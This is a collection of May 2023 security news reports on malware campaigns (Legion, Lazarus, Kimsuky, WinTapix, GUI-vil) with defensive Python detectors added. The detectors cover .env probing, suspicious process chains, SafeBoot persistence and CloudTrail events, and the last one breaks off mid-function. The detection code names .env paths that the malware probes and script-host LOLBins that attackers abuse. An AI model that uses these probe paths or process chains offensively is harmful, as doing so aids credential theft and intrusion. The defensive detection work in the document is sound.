iRecorder is the work of a developer named Coffeeholic Dev, who has also released several other apps over the years. None of them are accessible as of writing -

iBlock (com.tsoft.app.iblock.ad)
iCleaner (com.isolar.icleaner)
iEmail (com.tsoft.app.email)
iLock (com.tsoft.app.ilock)
iVideoDownload (com.tsoft.app.ivideodownload)
iVPN (com.ivpn.speed)
File speaker (com.teasoft.filespeaker)
QR Saver (com.teasoft.qrsaver)
Tin nóng tin lạnh (read: Hot news and cold news in Vietnamese) (com.teasoft.news)
This development is just the latest example of malware adopting a technique called versioning, which refers to uploading a clean version of the app to the Play Store to build trust among users and then adding malicious code at a later stage via app updates, in a bid to slip through the app review process.

"The AhRat research case serves as a good example of how an initially legitimate application can transform into a malicious one, even after many months, spying on its users and compromising their privacy," Štefanko said.


Legion Malware Upgraded to Target SSH Servers and AWS Credentials
24.5.23  Virus  The Hacker News
Legion malware
An updated version of the commodity malware called Legion comes with expanded features to compromise SSH servers and Amazon Web Services (AWS) credentials associated with DynamoDB and CloudWatch.

"This recent update demonstrates a widening of scope, with new capabilities such the ability to compromise SSH servers and retrieve additional AWS-specific credentials from Laravel web applications," Cado Labs researcher Matt Muir said in a report shared with The Hacker News.

"It's clear that the developer's targeting of cloud services is advancing with each iteration."

Legion, a Python-based hack tool, was first documented last month by the cloud security firm, detailing its ability to breach vulnerable SMTP servers in order to harvest credentials.

It's also known to exploit web servers running content management systems (CMS), leverage Telegram as a data exfiltration point, and send spam SMS messages to a list of dynamically-generated U.S. mobile numbers by making use of the stolen SMTP credentials.

A notable addition to Legion is its ability to exploit SSH servers using the Paramiko module. It also includes features to retrieve additional AWS-specific credentials related to DynamoDB, CloudWatch, and AWS Owl from Laravel web applications.
Another change relates to the inclusion of additional paths to enumerate for the existence of .env files such as /cron/.env, /lib/.env, /sitemaps/.env, /tools/.env, /uploads/.env, and /web/.env among others.
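The .env paths listed above are easy to watch for in web server access logs. The following detector is an added example, not part of Cado's report or the Legion tool: it parses combined-format log lines (constructed here, not real traffic), flags every request for a .env file or variant, and marks a request as an exposure when the server answered 200, since that means the secrets were actually served.

```python
import re
from collections import defaultdict

# Exact paths the report lists Legion probing; ENV_PATH_RE generalizes to any
# request whose final component is a .env file, including .env.bak-style copies.
REPORTED_ENV_PATHS = {
    "/cron/.env", "/lib/.env", "/sitemaps/.env",
    "/tools/.env", "/uploads/.env", "/web/.env",
}
ENV_PATH_RE = re.compile(r"/\.env(\.[A-Za-z0-9_-]+)?$")

# Combined/common log format: client identd user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = """\
203.0.113.7 - - [24/May/2023:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5123
198.51.100.9 - - [24/May/2023:10:01:05 +0000] "GET /.env HTTP/1.1" 404 153
198.51.100.9 - - [24/May/2023:10:01:06 +0000] "GET /uploads/.env HTTP/1.1" 200 842
198.51.100.9 - - [24/May/2023:10:01:07 +0000] "GET /tools/.env?x=1 HTTP/1.1" 404 153
198.51.100.9 - - [24/May/2023:10:01:08 +0000] "GET /web/.env.bak HTTP/1.1" 403 199
203.0.113.7 - - [24/May/2023:10:02:11 +0000] "POST /login HTTP/1.1" 302 0
"""


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["target"].split("?", 1)[0]  # drop the query string
    rec["status"] = int(rec["status"])
    return rec


def is_env_probe(path):
    """True for the reported paths and for any other /.env[.suffix] request."""
    return path in REPORTED_ENV_PATHS or bool(ENV_PATH_RE.search(path))


def find_env_probes(log_text):
    """Return one finding per .env request: (client, path, status, exposed).

    exposed is True when the server returned 200: the file was served and any
    credentials in it must be treated as leaked and rotated.
    """
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_env_probe(rec["path"]):
            findings.append((rec["client"], rec["path"], rec["status"],
                             rec["status"] == 200))
    return findings


def probing_clients(log_text, min_hits=2):
    """Clients that requested .env paths at least min_hits times."""
    hits = defaultdict(int)
    for client, _path, _status, _exposed in find_env_probes(log_text):
        hits[client] += 1
    return {client: n for client, n in hits.items() if n >= min_hits}


if __name__ == "__main__":
    for finding in find_env_probes(SAMPLE_LOG):
        print(finding)
    print("repeat probers:", probing_clients(SAMPLE_LOG))
```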

"Misconfigurations in web applications are still the primary method used by Legion to retrieve credentials," Muir said.

"Therefore, it's recommended that developers and administrators of web applications regularly review access to resources within the applications themselves, and seek alternatives to storing secrets in environment files."


N. Korean Lazarus Group Targets Microsoft IIS Servers to Deploy Espionage Malware
24.5.23  APT  The Hacker News
Microsoft IIS Servers
The infamous Lazarus Group actor has been targeting vulnerable versions of Microsoft Internet Information Services (IIS) servers as an initial breach route to deploy malware on targeted systems.

The findings come from the AhnLab Security Emergency response Center (ASEC), which detailed the advanced persistent threat's (APT) continued abuse of DLL side-loading techniques to run arbitrary payloads.

"The threat actor places a malicious DLL (msvcr100.dll) in the same folder path as a normal application (Wordconv.exe) via the Windows IIS web server process, w3wp.exe," ASEC explained. "They then execute the normal application to initiate the execution of the malicious DLL."

DLL side-loading, similar to DLL search-order hijacking, refers to the proxy execution of a rogue DLL via a benign binary planted in the same directory.

Lazarus, a highly-capable and relentless nation-state group linked to North Korea, was most recently spotted leveraging the same technique in connection with the cascading supply chain attack on enterprise communications service provider 3CX.

The malicious msvcr100.dll library, for its part, is designed to decrypt an encoded payload that's then executed in memory. The malware is said to be a variant of a similar artifact that was discovered by ASEC last year and which acted as a backdoor to communicate with an actor-controlled server.

The attack chain further entailed the exploitation of a discontinued open source Notepad++ plugin called Quick Color Picker to deliver additional malware in order to facilitate credential theft and lateral movement.

The latest development demonstrates the diversity of Lazarus attacks and its ability to employ an extensive set of tools against victims to carry out long-term espionage operations.

"In particular, since the threat group primarily utilizes the DLL side-loading technique during their initial infiltrations, companies should proactively monitor abnormal process execution relationships and take preemptive measures to prevent the threat group from carrying out activities such as information exfiltration and lateral movement," ASEC said.

U.S. Treasury Sanctions North Korean Entities
The findings also come as the U.S. Treasury Department sanctioned four entities and one individual involved in malicious cyber activities and fundraising schemes that aim to support North Korea's strategic priorities.
This includes the Pyongyang University of Automation, the Technical Reconnaissance Bureau and its subordinate cyber unit, the 110th Research Center, Chinyong Information Technology Cooperation Company, and a North Korean national named Kim Sang Man.

The Lazarus Group and its various clusters are believed to be operated by the Technical Reconnaissance Bureau, which oversees North Korea's development of offensive cyber tactics and tools.

The sanctions-hit nation, besides engaging in cryptocurrency theft and espionage operations, is known to generate illicit revenue from a workforce of skilled IT workers who operate under fictitious identities to obtain jobs in the technology and virtual currency sectors across the world.

"The DPRK conducts malicious cyber activities and deploys information technology (IT) workers who fraudulently obtain employment to generate revenue, including in virtual currency, to support the Kim regime and its priorities, such as its unlawful weapons of mass destruction and ballistic missile programs," the department said.

"These workers deliberately obfuscate their identities, locations, and nationalities, typically using fake personas, proxy accounts, stolen identities, and falsified or forged documentation to apply for jobs at these companies."

"They earn hundreds of millions of dollars a year by engaging in a wide range of IT development work, including freelance work platforms (websites/applications) and cryptocurrency development, after obtaining freelance employment contracts from companies around the world," the South Korean government warned in December 2022.


Cyber Attacks Strike Ukraine's State Bodies in Espionage Operation
24.5.23  BigBrothers  The Hacker News

The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of cyber attacks targeting state bodies in the country as part of an espionage campaign.

The intrusion set, attributed to a threat actor tracked by the authority as UAC-0063 since 2021, leverages phishing lures to deploy a variety of malicious tools on infected systems. The origins of the hacking crew are presently unknown.

In the attack chain described by the agency, the emails targeted an unspecified ministry and purported to be from the Embassy of Tajikistan in Ukraine. It's suspected that the messages were sent from a previously compromised mailbox.

The emails come attached with a Microsoft Word document that, upon enabling macros, launches an encoded VBScript called HATVIBE, which is then used to drop additional malware.

This includes a keylogger (LOGPIE), a Python-based backdoor capable of running commands sent from a remote server (CHERRYSPY), and a tool focused on exfiltrating files with specific extensions (STILLARCH or DownEx).

It's worth noting that DownEx was recently documented by Bitdefender as being used by an unknown actor in highly targeted attacks aimed at government entities in Kazakhstan and Afghanistan.

"Additional study of the infrastructure and related files made it possible to conclude that among the objects of interest of the group are organizations from Mongolia, Kazakhstan, Kyrgyzstan, Israel, [and] India," CERT-UA said.

The findings show that some threat actors are still employing macro-based malware despite Microsoft disabling the feature by default in Office files downloaded from the web.

That said, Microsoft's restrictions have led several attack groups to experiment and adapt their attack chains and payload delivery mechanisms to include uncommon file types (CHM, ISO, LNK, VHD, XLL, and WSF) and techniques like HTML smuggling.
Enterprise security firm Proofpoint said it observed multiple initial access brokers (IABs) – actors who infiltrate major targets and then sell that access to other cybercriminals for profit – using PDF and OneNote files starting in December 2022.

"The experimentation with and regular pivoting to new payload delivery techniques by tracked threat actors, especially IABs, is vastly different from attack chains observed prior to 2022 and heralds a new normal of threat activity," the company said.

"No longer are the most experienced cybercriminal actors relying on one or a few techniques, but rather are frequently developing and iterating new TTPs. The rapid rate of change for many threat actors suggests they have the time, capability, and understanding of the threat landscape to rapidly develop and execute new techniques."


GoldenJackal: New Threat Group Targeting Middle Eastern and South Asian Governments
24.5.23  BigBrothers  The Hacker News
GoldenJackal Threat Group
Government and diplomatic entities in the Middle East and South Asia are the target of a new advanced persistent threat actor named GoldenJackal.

Russian cybersecurity firm Kaspersky, which has been keeping tabs on the group's activities since mid-2020, characterized the adversary as both capable and stealthy.

The targeting scope of the campaign is focused on Afghanistan, Azerbaijan, Iran, Iraq, Pakistan, and Turkey, infecting victims with tailored malware that steals data, propagates across systems via removable drives, and conducts surveillance.

GoldenJackal is suspected to have been active for at least four years, although little is known about the group. Kaspersky said it has been unable to determine its origin or affiliation with known threat actors, but the actor's modus operandi suggests an espionage motivation.

What's more, the threat actor's attempts to maintain a low profile and disappear into the shadows bear all the hallmarks of a state-sponsored group.

That said, some tactical overlaps have been observed between the threat actor and Turla, one of Russia's elite nation-state hacking crews. In one instance, a victim machine was infected by Turla and GoldenJackal two months apart.

The exact initial path employed to breach targeted computers is unknown at this stage, but evidence gathered so far points to the use of trojanized Skype installers and malicious Microsoft Word documents.

While the installer serves as a conduit to deliver a .NET-based trojan called JackalControl, the Word files have been observed weaponizing the Follina vulnerability (CVE-2022-30190) to drop the same malware.

JackalControl, as the name indicates, enables the attackers to remotely commandeer the machine, execute arbitrary commands, as well as upload and download from and to the system.

Geography of victims
Some of the other malware families deployed by GoldenJackal are as follows -

JackalSteal - An implant that's used to find files of interest, including those located in removable USB drives, and transmit them to a remote server.
JackalWorm - A worm that's engineered to infect systems using removable USB drives and install the JackalControl trojan.
JackalPerInfo - A malware that comes with features to harvest system metadata, folder contents, installed applications, and running processes, and credentials stored in web browser databases.
JackalScreenWatcher - A utility to grab screenshots based on a preset time interval and send them to an actor-controlled server.

Another notable aspect of the threat actor is its reliance on hacked WordPress sites as a relay to forward web requests to the actual command-and-control (C2) server by means of a rogue PHP file injected into the websites.

"The group is probably trying to reduce its visibility by limiting the number of victims," Kaspersky researcher Giampaolo Dedola said. "Their toolkit seems to be under development – the number of variants shows that they are still investing in it."


North Korean Kimsuky Hackers Strike Again with Advanced Reconnaissance Malware
24.5.23  Virus  The Hacker News
The North Korean advanced persistent threat (APT) group known as Kimsuky has been observed using a piece of custom malware called RandomQuery as part of a reconnaissance and information exfiltration operation.

"Lately, Kimsuky has been consistently distributing custom malware as part of reconnaissance campaigns to enable subsequent attacks," SentinelOne researchers Aleksandar Milenkoski and Tom Hegel said in a report published today.

The ongoing targeted campaign, per the cybersecurity firm, is primarily geared towards information services as well as organizations supporting human rights activists and North Korean defectors.

Kimsuky, active since 2012, has exhibited targeting patterns that align with North Korea's operational mandates and priorities.

The intelligence collection missions have involved the use of a diverse set of malware, including another reconnaissance program called ReconShark, as detailed by SentinelOne earlier this month.

The latest activity cluster associated with the group commenced on May 5, 2023, and leverages a variant of RandomQuery that's specifically designed to enumerate files and siphon sensitive data.

RandomQuery, alongside FlowerPower and AppleSeed, is among the most frequently distributed tools in Kimsuky's arsenal, functioning both as an information stealer and as a conduit for distributing remote access trojans like TutRAT and xRAT.

The attacks begin with phishing emails that purport to be from Daily NK, a prominent Seoul-based online publication that covers North Korean affairs, to entice potential targets into opening a Microsoft Compiled HTML Help (CHM) file.

It's worth noting at this stage that CHM files have also been adopted as a lure by a different North Korean nation-state actor referred to as ScarCruft.

Launching the CHM file leads to the execution of a Visual Basic Script that issues an HTTP GET request to a remote server to retrieve the second-stage payload, a VBScript flavor of RandomQuery.

The malware then proceeds to harvest system metadata, running processes, installed applications, and files from different folders, all of which are transmitted back to the command-and-control (C2) server.
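Both chains above hinge on a parent-child relationship that should not occur on a healthy host: the IIS worker w3wp.exe starting an arbitrary application (the Lazarus side-loading host described earlier on this page), and the CHM viewer spawning a script interpreter (the Kimsuky RandomQuery stager). The Python below is an added example of the "abnormal process execution relationships" monitoring ASEC recommends, written for this page rather than taken from either vendor's report. It assumes hh.exe is the CHM handler, every path in the sample telemetry is constructed, the event fields are modelled loosely on Sysmon Event ID 1, and the allowlist of legitimate w3wp.exe children has to be baselined per server.

```python
from __future__ import annotations
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str   # Sysmon: ParentImage
    image: str          # Sysmon: Image
    command_line: str   # Sysmon: CommandLine


# Children the IIS worker process legitimately spawns (assumption: baseline this per server;
# csc.exe/cvtres.exe appear during ASP.NET dynamic compilation).
W3WP_EXPECTED_CHILDREN = {"csc.exe", "cvtres.exe", "conhost.exe", "werfault.exe"}
# Interpreters and LOLBins a help-file viewer has no business launching.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe", "mshta.exe", "rundll32.exe"}
# Web-writable roots where a planted EXE/DLL pair would land (assumption; adjust to your layout).
WEB_ROOTS = ("c:\\inetpub\\wwwroot\\",)


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def evaluate(ev: ProcEvent) -> list[str]:
    """Return the names of the rules an event trips (empty list means nothing suspicious)."""
    parent, child, image = _name(ev.parent_image), _name(ev.image), ev.image.lower()
    hits = []
    if parent == "w3wp.exe" and child not in W3WP_EXPECTED_CHILDREN:
        hits.append("iis_worker_unexpected_child")
    if parent == "w3wp.exe" and image.startswith(WEB_ROOTS):
        hits.append("iis_worker_child_from_web_root")
    if parent == "hh.exe" and child in SCRIPT_HOSTS:
        hits.append("chm_viewer_spawned_script_host")
    return hits


def scan(events: list[ProcEvent]) -> list[tuple[ProcEvent, list[str]]]:
    return [(ev, hits) for ev in events if (hits := evaluate(ev))]


# Constructed sample telemetry, not taken from either report.
SAMPLE_EVENTS = [
    # ASP.NET compiling a page: expected child of w3wp.exe, no alert
    ProcEvent(r"C:\Windows\System32\inetsrv\w3wp.exe",
              r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              "csc.exe /noconfig /fullpaths @tmp.cmdline"),
    # IIS worker launching the benign side-loading host from a web-writable folder (constructed path)
    ProcEvent(r"C:\Windows\System32\inetsrv\w3wp.exe",
              r"C:\inetpub\wwwroot\upload\Wordconv.exe",
              "Wordconv.exe"),
    # CHM viewer handing off to a VBScript host
    ProcEvent(r"C:\Windows\hh.exe",
              r"C:\Windows\System32\wscript.exe",
              r"wscript.exe //e:vbscript C:\Users\u\AppData\Local\Temp\stage.vbs"),
    # A user opening a CHM from Explorer is not by itself suspicious
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\hh.exe",
              r"hh.exe C:\Users\u\Downloads\report.chm"),
]

if __name__ == "__main__":
    for ev, hits in scan(SAMPLE_EVENTS):
        print(f"{_name(ev.parent_image)} -> {ev.image}: {', '.join(hits)}")
```

Feed it real process-creation telemetry and the two rules that fire on the sample are the ones worth paging on; the expected-children set is the part that needs tuning, since every IIS deployment spawns something slightly different.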

"This campaign also demonstrates the group's consistent approach of delivering malware through CHM files," the researchers said.

"These incidents underscore the ever-changing landscape of North Korean threat groups, whose remit not only encompasses political espionage but also sabotage and financial threats."

The findings arrive days after the AhnLab Security Emergency response Center (ASEC) uncovered a watering hole attack mounted by Kimsuky that entails setting up a lookalike webmail system used by national policy research institutes to harvest credentials entered by victims.

In a related development, Kimsuky has also been linked to attacks that weaponize vulnerable Windows Internet Information Services (IIS) servers to drop the Metasploit Meterpreter post-exploitation framework, which is then used to deploy a Go-based proxy malware.


New WinTapix.sys Malware Engages in Multi-Stage Attack Across Middle East
24.5.23  Virus  The Hacker News
WinTapix.sys Malware
An unknown threat actor has been observed leveraging a malicious Windows kernel driver in attacks likely targeting the Middle East since at least May 2020.

Fortinet Fortiguard Labs, which dubbed the artifact WINTAPIX (WinTapix.sys), attributed the malware with low confidence to an Iranian threat actor.

"WinTapix.sys is essentially a loader," security researchers Geri Revay and Hossein Jazi said in a report published on Monday. "Thus, its primary purpose is to produce and execute the next stage of the attack. This is done using a shellcode."

Samples and telemetry data analyzed by Fortinet show that the campaign's primary focus is on Saudi Arabia, Jordan, Qatar, and the United Arab Emirates. The activity has not been tied to a known threat actor or group.

By using a malicious kernel mode driver, the idea is to subvert or disable security mechanisms and gain entrenched access to the targeted host.

Such drivers run within the kernel memory and can, therefore, perform any operation, including altering critical security mechanisms and running arbitrary code with the highest privileges.

In other words, it offers a stealthy way to infiltrate deeper into the targeted system, maintain persistence, and execute additional payloads or commands as part of the threat actor's multi-stage attack.

WinTapix.sys Malware
A key security measure against malicious drivers is Driver Signature Enforcement, under which the kernel loads only drivers carrying a signature it trusts; on 64-bit Windows 10 and later that in practice means drivers signed through Microsoft's hardware portal, although drivers cross-signed with certificates issued before Microsoft's policy cutoff remain loadable for compatibility, which is what keeps stolen or leaked cross-signing certificates (as with the POORTRY driver discussed below) useful to attackers. The tech giant also maintains driver block rules to protect against known vulnerable drivers.

WinTapix.sys, on the other hand, carries an invalid signature, so the threat actor must first load a legitimate but vulnerable driver and abuse it to get WINTAPIX into the kernel, the bring-your-own-vulnerable-driver (BYOVD) approach.

But once it's loaded in the kernel, WinTapix.sys is configured to inject an embedded shellcode into an appropriate user mode process that, in turn, executes an encrypted .NET payload that's specifically designed to target Microsoft Internet Information Services (IIS) servers.

WINTAPIX, besides embedding the shellcode created using the open source Donut project, establishes persistence by means of Windows Registry modifications that allows it to be loaded even when the machine is booted in Safe Mode.
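One check a responder can run against that Safe Mode persistence, as an added example written for this page and not Fortinet's tooling: when booted into Safe Mode, Windows starts only the drivers and services listed under HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal and \Network, so a driver that wants to survive such a boot registers itself there. The Python below parses a `reg export` of those keys and reports entries missing from a known-good baseline. The export text, the partial baseline and the entry name `wintapix` are all constructed for the demo; the report as summarized here does not name the key the driver adds.

```python
from __future__ import annotations
import re

# Assumption: Safe Mode only starts drivers/services listed under these keys, so a driver that
# must survive a Safe Mode boot adds itself there. ControlSet00N is matched as well because
# offline exports often name the control set explicitly.
SAFEBOOT_KEY = re.compile(
    r"^\[HKEY_LOCAL_MACHINE\\SYSTEM\\(?:CurrentControlSet|ControlSet\d{3})"
    r"\\Control\\SafeBoot\\(Minimal|Network)\\([^\]]+)\]$", re.IGNORECASE)

# Constructed, partial baseline; capture the real one from a known-good host of the same image.
BASELINE = {
    "Minimal": {"AppInfo", "Base", "Boot Bus Extender", "vga.sys"},
    "Network": {"AppInfo", "Base", "Boot Bus Extender", "NDIS Wrapper", "vga.sys"},
}


def parse_safeboot(reg_text: str) -> dict[tuple[str, str], str | None]:
    """Map (profile, entry name) -> the entry's default value ("Driver", "Service", ...) from a .reg export."""
    entries: dict[tuple[str, str], str | None] = {}
    current = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        m = SAFEBOOT_KEY.match(line)
        if m:
            current = (m.group(1).capitalize(), m.group(2))
            entries[current] = None
        elif line.startswith("["):          # some unrelated key: stop attributing values
            current = None
        elif current and line.startswith("@="):
            entries[current] = line[2:].strip().strip('"')
    return entries


def unexpected_entries(entries, baseline=BASELINE) -> list[tuple[str, str, str | None]]:
    """Entries present in the export but absent from the baseline for that Safe Mode profile."""
    return sorted(
        (profile, name, value)
        for (profile, name), value in entries.items()
        if name.lower() not in {b.lower() for b in baseline.get(profile, set())}
    )


# Constructed export (reg export "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot" safeboot.reg);
# the "wintapix" entry is a stand-in name, not one taken from the report.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppInfo]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Base]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\wintapix]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wintapix]
"Type"=dword:00000001
"Start"=dword:00000002
"""

if __name__ == "__main__":
    for profile, name, value in unexpected_entries(parse_safeboot(SAMPLE_EXPORT)):
        print(f"SafeBoot\\{profile}\\{name} = {value!r}: not in baseline")
```

Any entry this flags deserves a look at the matching Services key and the on-disk image it points to; a driver that is both unknown to the baseline and not a signed Microsoft binary is exactly the WINTAPIX profile.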

For its part, the .NET malware is equipped with backdoor and proxy features to execute commands, carry out file download and upload, and function as a proxy to pass data between two communication endpoints.

"Since Iranian threat actors are known to exploit Exchange servers to deploy additional malware, it is also possible that this driver has been employed alongside Exchange attacks," the researchers said.

"To that point, the compilation time of the drivers is also aligned with times when Iranian threat actors were exploiting Exchange server vulnerabilities."

The development comes as the ALPHV (aka BlackCat or Noberus) ransomware group has been observed taking advantage of a malicious signed driver to impair security defenses and escape detection for extended periods of time.

The driver in question, ktgn.sys, is an updated version of POORTRY that's signed using a stolen or leaked cross-signing certificate, cybersecurity firm Trend Micro said in a report.

POORTRY is the name assigned to a Windows kernel driver that comes with capabilities to terminate security software. Late last year, it was disclosed as used by ransomware gangs and a threat actor known as UNC3944 (aka Roasted 0ktapus and Scattered Spider).

"Malicious actors that are actively seeking high-privilege access to the Windows operating system use techniques that attempt to combat the increased protection on users and processes via endpoint protection platform (EPP) and endpoint detection and response (EDR) technologies," Trend Micro said.

"These malicious actors also tend to possess enough financial resources to either purchase rootkits from underground sources or to buy code-signing certificates to build a rootkit."


China Bans U.S. Chip Giant Micron, Citing "Serious Cybersecurity Problems"
24.5.23  BigBrothers  The Hacker News
China bans Micron
China has banned U.S. chip maker Micron from selling its products to Chinese companies working on key infrastructure projects, citing national security risks.

The development comes nearly two months after the country's cybersecurity authority initiated a probe in late March 2023 to assess potential network security risks.

"The purpose of this network security review of Micron's products is to prevent product network security problems from endangering the security of national critical information infrastructure, which is a necessary measure to maintain national security," the Cyberspace Administration of China (CAC) said.

The CAC further said the investigation found "serious cybersecurity problems" in Micron's products, endangering the country's critical information infrastructure supply chain.

As a result, operators involved in such critical information infrastructure projects should stop purchasing products from Micron, it added.

The authority did not disclose the specific cybersecurity concerns posed by Micron, but cited violations of local laws and regulations.
In a statement shared with the Wall Street Journal, Micron said it's "evaluating the conclusion and assessing our next steps." The restrictions "have no basis in fact," the U.S. Commerce Department was quoted as saying to the BBC.

The tit-for-tat development comes amid escalating geopolitical tensions between China and the U.S., and mirrors similar moves made by the U.S. government against Chinese equipment makers over security concerns.


E.U. Regulators Hit Meta with Record $1.3 Billion Fine for Data Transfer Violations
24.5.23  BigBrothers  The Hacker News
Facebook's parent company Meta has been fined a record $1.3 billion by European Union data protection regulators for transferring the personal data of users in the region to the U.S.

In a binding decision taken by the European Data Protection Board (EDPB), the social media giant has been ordered to bring its data transfers into compliance with the GDPR and delete unlawfully stored and processed data within six months.

Additionally, Meta has been given five months to suspend any future transfer of Facebook users' data to the U.S. Instagram and WhatsApp, which are also owned by the company, are not subject to the order.

"The EDPB found that Meta IE's infringement is very serious since it concerns transfers that are systematic, repetitive, and continuous," Andrea Jelinek, EDPB Chair, said in a statement.

"Facebook has millions of users in Europe, so the volume of personal data transferred is massive. The unprecedented fine is a strong signal to organizations that serious infringements have far-reaching consequences."

European data protection authorities have repeatedly emphasized the lack of equivalent privacy protections as that of GDPR in the U.S., potentially allowing American intelligence services to access data belonging to Europeans by virtue of them being shipped to servers located in the U.S.

The ruling stems from a legal complaint filed by Austrian privacy activist Maximilian Schrems, the founder of NOYB, almost a decade ago in June 2013 over concerns that E.U. user data is not sufficiently safeguarded from U.S. mass surveillance programs when transferred across the Atlantic.

"The simplest fix would be reasonable limitations in U.S. surveillance law," Schrems said. "There is an understanding on both sides of the Atlantic that we need probable cause and judicial approval of surveillance.

"It would be time to grant these basic protections to E.U. customers of U.S. cloud providers. Any other big U.S. cloud provider, such as Amazon, Google or Microsoft could be hit with a similar decision under E.U. law."

"Meta plans to rely on the new deal for transfers going forward, but this is likely not a permanent fix," Schrems further added. "In my view, the new deal has maybe a ten percent chance of not being killed by the CJEU. Unless U.S. surveillance laws get fixed, Meta will likely have to keep E.U. data in the E.U."

Schrems also accused the Irish Data Protection Commission (DPC) of consistently attempting to block the case from going forward and trying to shield Meta from being slapped with a fine and having to delete the data that has been already transferred, the latter two of which have been overturned by the EDPB.

Meta, in response, said it intends to appeal the ruling, calling the fine "unjustified and unnecessary" and that there is a "fundamental conflict of law" between the U.S. government's rules on access to data and European privacy rights.

"Without the ability to transfer data across borders, the internet risks being carved up into national and regional silos, restricting the global economy and leaving citizens in different countries unable to access many of the shared services we have come to rely on," Meta's Nick Clegg and Jennifer Newstead said.

Last year, the company warned that if ordered to suspend transfers to the U.S., it may have to stop offering "a number of our most significant products and services" in the E.U. According to the Wall Street Journal, a new trans-Atlantic data transfer deal is expected to be finalized as a replacement for the Privacy Shield later this year.

The fine constitutes the largest ever imposed under the E.U.'s GDPR privacy laws, eclipsing the €746 million ($886.6 million at the time) fine previously doled out to Amazon in July 2021 for similar privacy violations.

The development also marks the third monetary penalty issued by the DPC against Meta this year alone. In January, the watchdog levied a fine of €390 million over Meta's mishandling of user information to serve ads on Facebook and Instagram.

Two weeks later, Meta was fined €5.5 million for violating data protection laws by compelling its users to "consent to the processing of their personal data for service improvement and security" and "making the accessibility of its services conditional on users accepting the updated Terms of Service."


Indonesian Cybercriminals Exploit AWS for Profitable Crypto Mining Operations
24.5.23  CyberCrime  The Hacker News
Crypto Mining
A financially motivated threat actor of Indonesian origin has been observed leveraging Amazon Web Services (AWS) Elastic Compute Cloud (EC2) instances to carry out illicit crypto mining operations.

Permiso P0 Labs, the research arm of the cloud security company Permiso, first detected the group in November 2021 and has assigned it the moniker GUI-vil (pronounced Goo-ee-vil).

"The group displays a preference for Graphical User Interface (GUI) tools, specifically S3 Browser (version 9.5.5) for their initial operations," the company said in a report shared with The Hacker News. "Upon gaining AWS Console access, they conduct their operations directly through the web browser."

Attack chains mounted by GUI-vil entail obtaining initial access by weaponizing AWS keys in publicly exposed source code repositories on GitHub or scanning for GitLab instances that are vulnerable to remote code execution flaws (e.g., CVE-2021-22205).

A successful ingress is followed by privilege escalation and internal reconnaissance to enumerate all available S3 buckets and determine which services are accessible via the AWS web console.

AWS Crypto Mining
A notable aspect of the threat actor's modus operandi is its attempt to blend in and persist within the victim environment by creating new users that conform to the same naming convention and ultimately meet its objectives.

"GUI-vil will also create access keys for the new identities they are creating so they can continue usage of S3 Browser with these new users," P0 Labs researchers Ian Ahl and Daniel Bohannon explained.

Alternatively, the group has also been spotted creating login profiles for existing users that do not have them so as to enable access to the AWS console without raising red flags.
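The sequence above (tool-driven initial access, a look-alike IAM user, a fresh access key for it, a login profile bolted onto an existing user, then EC2 launches) is all visible in CloudTrail. The Python below is an added example written for this page, not Permiso's detection content: it replays constructed CloudTrail-style records in time order and correlates follow-on actions with recently created identities. The `S3 Browser` user-agent substring, the 24-hour correlation window and every user name in the sample are assumptions.

```python
from __future__ import annotations
from datetime import datetime, timedelta

# Assumptions (not from the report): S3 Browser identifies itself in userAgent with this
# substring, and 24 hours is a sensible window for tying follow-on actions to a freshly
# created identity. Tune both to your environment.
GUI_TOOL_MARKER = "S3 Browser"
NEW_IDENTITY_WINDOW = timedelta(hours=24)


def _when(rec: dict) -> datetime:
    return datetime.fromisoformat(rec["eventTime"].replace("Z", "+00:00"))


def _actor(rec: dict) -> str:
    ident = rec.get("userIdentity", {})
    return ident.get("userName") or ident.get("arn", "?")


def hunt(records: list[dict]) -> list[tuple[str, str, str]]:
    """Return (eventTime, rule, detail) findings in chronological order."""
    created_at: dict[str, datetime] = {}     # IAM user -> time of the CreateUser call that made it
    findings = []
    for rec in sorted(records, key=_when):
        name, actor, when = rec["eventName"], _actor(rec), _when(rec)
        ua = rec.get("userAgent", "")
        target = (rec.get("requestParameters") or {}).get("userName")

        if GUI_TOOL_MARKER in ua:
            findings.append((rec["eventTime"], "gui_tool_user_agent", f"{actor} used {ua}"))
        if name == "CreateUser" and target:
            created_at[target] = when            # watch what this identity does next
        if name == "CreateLoginProfile" and target:
            kind = "new" if target in created_at else "existing"
            findings.append((rec["eventTime"], "console_access_granted",
                             f"{actor} enabled console sign-in for {kind} user {target}"))
        if (name == "CreateAccessKey" and target in created_at
                and when - created_at[target] <= NEW_IDENTITY_WINDOW):
            findings.append((rec["eventTime"], "access_key_for_new_identity",
                             f"{actor} created a key for {target} shortly after creating it"))
        if (name == "RunInstances" and actor in created_at
                and when - created_at[actor] <= NEW_IDENTITY_WINDOW):
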